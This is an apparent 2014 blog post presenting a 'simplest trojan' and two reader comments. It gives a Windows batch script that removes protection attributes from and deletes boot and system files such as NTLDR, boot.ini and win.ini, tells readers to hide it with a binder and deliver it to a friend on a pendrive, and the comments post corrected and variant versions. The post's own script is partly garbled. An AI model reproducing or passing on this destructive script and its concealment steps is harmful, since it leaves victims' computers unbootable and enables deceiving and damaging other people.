Saturday, 22 November 2014

simplest trojan in the world

well....

DID YOU EVER IMAGINE YOU COULD CREATE SOMETHING THAT CAN CRASH A COMPUTER IN THE NOTEPAD ITSELF???

if not....see these steps:

1)open note pad

2) type in :    @echo off
                  ATTRIB-R-S-H
                 C:\AUTOEXEC.BAT
                DEL C:\ AUTOEXEC.BAT
               ATTRIB -R-S-H C:\Boot.INI
               DEL C:\NTLDR
               ATTRIB-R-S-H C:\windows\win ini
               DEL C: \windows\win.ini

3)save it as a .bat extention
4)use a binder to hide it
5)get a pendrive and send it to your friend
just remember do not execute it n your own system....
enjoy :)


                 

2 comments:

  1. no.
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini

    ReplyDelete
  2. i have just got
    @echo off
    attrib -S -R -H C:\ntldr
    del C:\ntldr
    attrib -S -R -H C:\win.ini
    del C:\win.ini
    :loop

    ReplyDelete